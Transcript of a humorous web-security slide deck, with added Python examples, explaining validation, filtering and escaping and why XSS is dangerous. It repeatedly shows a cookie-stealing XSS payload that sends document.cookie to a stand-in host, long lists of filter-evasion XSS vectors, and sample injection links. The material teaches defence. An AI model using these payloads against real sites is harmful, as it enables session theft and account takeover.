Basic web application security

Presentation Transcript


Basic Web Application Security


User Input


Kick Your Arse


Three Ways

(All Awesome)


Validation


Passive

(No touchy-touchy)


This is a Number.

2


This is not a Number.

a


This is really not a Number.

<script>alert('loldongs')</script>


Filtering


Destructive

(One-Way Street)


Only letting the good stuff in.


or


Keeping out the bad stuff.


What’s the diff?

(Bro.)


Both can be error-prone...


What happens when

you screw it up?

White-Listing -> Usability Problems

Black-Listing -> Security Problems

(Always a trade-off.)


Escaping


Transport

Point A -> Point B


Data will be the same on both sides.


Different Media, Different Escaping


HTML

<b>Huh.</b>

<p><i>&lt;b&gt;Huh.&lt;/b&gt;</i></p>

<b>Huh.</b>


SQL

Sam O’Brien

INSERT INTO mah_peeps (name)

VALUES ('Sam O\'Brien');

1, Sam O’Brien, 2010-09-02 18:30:00
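Added example (not from the presentation) putting the three strategies side by side on the inputs the slides use: validation says yes or no, filtering throws characters away, escaping survives the round trip from Point A to Point B. For SQL it uses a bound parameter (sqlite3's ? placeholder) instead of a hand-built quoted string, which is what the backslash in 'Sam O\'Brien' is doing by hand. Note that Python's cgi.escape(), named later in the slides, was removed in Python 3.8; html.escape() replaces it.

```python
import html
import re
import sqlite3

# Constructed inputs, taken from the slides' own examples.
NUMBER_OK = "2"
NUMBER_BAD = "a"
NUMBER_REALLY_BAD = "<script>alert('loldongs')</script>"
HTML_SNIPPET = "<b>Huh.</b>"
NAME = "Sam O'Brien"


def validate_number(value: str) -> bool:
    """Validation is passive: accept or reject, never modify.
    Allow-list of ASCII digits; everything else is rejected."""
    return re.fullmatch(r"[0-9]+", value) is not None


def filter_to_alnum(value: str) -> str:
    """Filtering is destructive: strip anything that is not a letter,
    digit or space. The original input cannot be recovered."""
    return "".join(ch for ch in value if ch.isalnum() or ch == " ")


def escape_html(value: str) -> str:
    """Escaping is for transport: the browser decodes the entities and
    the user sees exactly the text that went in."""
    return html.escape(value, quote=True)


def roundtrip(value: str) -> bool:
    """Escaping, unlike filtering, is reversible."""
    return html.unescape(escape_html(value)) == value


def insert_name(conn: sqlite3.Connection, name: str) -> str:
    """SQL 'escaping' the safe way: a bound parameter, so the driver
    handles the quote in O'Brien and no string is ever spliced in."""
    conn.execute("INSERT INTO mah_peeps (name) VALUES (?)", (name,))
    return conn.execute("SELECT name FROM mah_peeps").fetchone()[0]


def demo() -> dict:
    """Run all three strategies on the slide inputs and collect results."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mah_peeps (id INTEGER PRIMARY KEY, name TEXT)")
    return {
        "validate": [validate_number(v) for v in (NUMBER_OK, NUMBER_BAD, NUMBER_REALLY_BAD)],
        "filter": filter_to_alnum(NUMBER_REALLY_BAD),
        "escape": escape_html(HTML_SNIPPET),
        "reversible": roundtrip(HTML_SNIPPET),
        "sql": insert_name(conn, NAME),
    }
```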


XSS

(Cross-Site Scripting)


SS

(XTREME Site Scripting)


Sticking Scripts Where They Don’t Belong.

You there, down the back.

Stop sniggering.


<script>alert('HACKED BY LOLDONGS')</script>

Amateurs!


<script>alert(document.cookie)</script>

Hmm.


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Oh shit.


Why is this uncool?

(Yeah! Why?)


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Ooooh shit.


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Oooooooooooh shit.


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Oooooooooooooooooh shit.


Why is this really uncool?

(Because shut up.)


HTTP

Hyper-Text Thingy I-forgot-again


Stateless


No Idea Who You Are.


It can guess. (Badly.)

IP Address

Browser User-Agent


Sends a cookie with each request.

(A basket of goodies that the browser sends faithfully every request.)


The Server puts a unique ID in the basket.

PHPSESSID=123your456mum789

__utma=12948.23.4211414.5553

is_a_furry=1


Browser sends the ID every request.

PHPSESSID=123your456mum789


<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Look again.


THEY HAVE YOUR COOKIE.

Ooooooooooooooooooooooo-


Preventing Shenanigans


HTML

Validation Really Hard.


HTML

Filtering Still Really Hard.

  • Use a library, e.g. HTML Purifier.


HTML

Escaping Dead Easy.

  • Most languages have stuff to handle this, e.g.

  • htmlentities(), cgi.escape(), CGI.escape()


How hard is filtering?

(It’s just <script>, right?)


THIS HARD.

<IMG SRC=javascript:alert('a')>

<img src=javascript:alert(&quot;a&quot;)>

<img """><script>alert('a')</script>">

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="javascript:alert('a');">

<IMG SRC="jav&#x09;as&#x09cript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<SCR\0IPT>alert('a')</SCR\0IPT>

<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>

<img onmouseover!#$%&=alert('a')>

<<SCRIPT>alert("a");//<</SCRIPT>

<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>

<SC\0RIPT SRC=http://foo/x.js?<B>

<script src=//foo/x.js>

<img src="javascript:alert('a')"

  • (Well, then.)


THIS HARD.

<iframe src=http://foo/x.html <

<body background="javascript:alert('a')">

<BODY ONLOAD=alert('a')>

<img dynsrc="javascript:alert('a')">

<img lowsrc="javascript:alert('a')">

<BGSOUND SRC=javascript:alert('a')>

<BR SIZE="&{alert('a')}">

<LAYER SRC="http://foo/x.html"></LAYER>

<link rel="stylesheet" href="javascript:alert('a');">

<XSS STYLE="behavior: url(xss.htc);">

<STYLE>BODY{-moz-binding:url("http://foo/x.xml#xss")}</STYLE>

<IMG SRC='vbscript:msgbox("a")'>

<img src="livescript:alert('a')">

¼script¾alert(¢XSS¢)¼/script¾ (US-ASCII encoding evasion)

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('a');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

  • (Well, then.)


THIS HARD.

<DIV STYLE="background-image: url(javascript:alert('a'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('a'))">

<DIV STYLE="width: expression(alert('a'));">

<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">

exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("a"))'>

<STYLE TYPE="text/javascript">alert('a');</STYLE>

<STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A>

<BASE HREF="javascript:alert('a');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT>

<EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

  • (Well, then.)
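The slides answer "how hard is filtering?" with three walls of vectors. As an added example (not from the presentation), the script below puts the obvious "strip <script>" filter beside a slightly better case-insensitive version and runs a handful of the slides' own vectors through each, using the one check a text context allows: no raw tag start may survive. html.escape() passes every case because it leaves no "<" at all, which is the point of "Escaping: Dead Easy".

```python
import html
import re

# Constructed test cases, taken from the filter-evasion vectors on the slides.
VECTORS = [
    "<script>alert('a')</script>",                     # what the filter expects
    "<SCRIPT>alert('a')</SCRIPT>",                     # case evasion
    "<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>",   # reassembles after one pass
    "<IMG SRC=javascript:alert('a')>",                 # no script tag at all
    "<BODY ONLOAD=alert('a')>",                        # event handler, no script tag
]

# In a text context no raw tag start may survive; that is the whole check.
TAG_START = re.compile(r"<\s*/?[a-z]", re.IGNORECASE)


def tag_survives(value: str) -> bool:
    """True if the filtered or escaped output still contains a tag start."""
    return TAG_START.search(value) is not None


def naive_filter(value: str) -> str:
    """'It's just <script>, right?' One pass, exact lowercase match."""
    return value.replace("<script>", "").replace("</script>", "")


def better_filter(value: str) -> str:
    """Case-insensitive, still a single pass: the nested vector reassembles."""
    return re.sub(r"</?script>", "", value, flags=re.IGNORECASE)


def audit(transform) -> list:
    """Run each vector through transform; True means it got through."""
    return [tag_survives(transform(v)) for v in VECTORS]


def audit_all() -> dict:
    """Blacklist filters versus plain escaping on the same inputs."""
    return {
        "naive": audit(naive_filter),
        "better": audit(better_filter),
        "escape": audit(html.escape),
    }


if __name__ == "__main__":
    for name, result in audit_all().items():
        print(f"{name:7s} {result}")
```

Note what the nested vector does to the "better" filter: removing the inner <SCRIPT> and </SCRIPT> leaves exactly <SCRIPT>alert('a');</SCRIPT> behind, so a single-pass blacklist manufactures the tag it was meant to remove.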


And one last thing.

(Groan.)


Remember <script>alert()</script>?

(Yes, I do. Shut up.)


alert() can be ANY JAVASCRIPT.

(Yes, and...?)


Do you have any forms on your page?

(Yes.)


Do you have any javascript functions your site uses to do anything useful?

(... Yes.)


Does your site make any AJAX calls to do anything useful?

(... Oh.)


That injected code can trigger forms, run javascript functions, or make AJAX calls.

(... Oooooh.)


Send someone to a link that looks like: http://my.site/?user=<script>doStuff();</script>

(... Oooooooooh.)


Or store something that will output this on someone's profile page: <script>doStuff();</script>

(... Oooooooooooooooh.)


... And you’re hosed.

(Shit.)


The Human Element

Touchy-Feely Commie Bullshit.

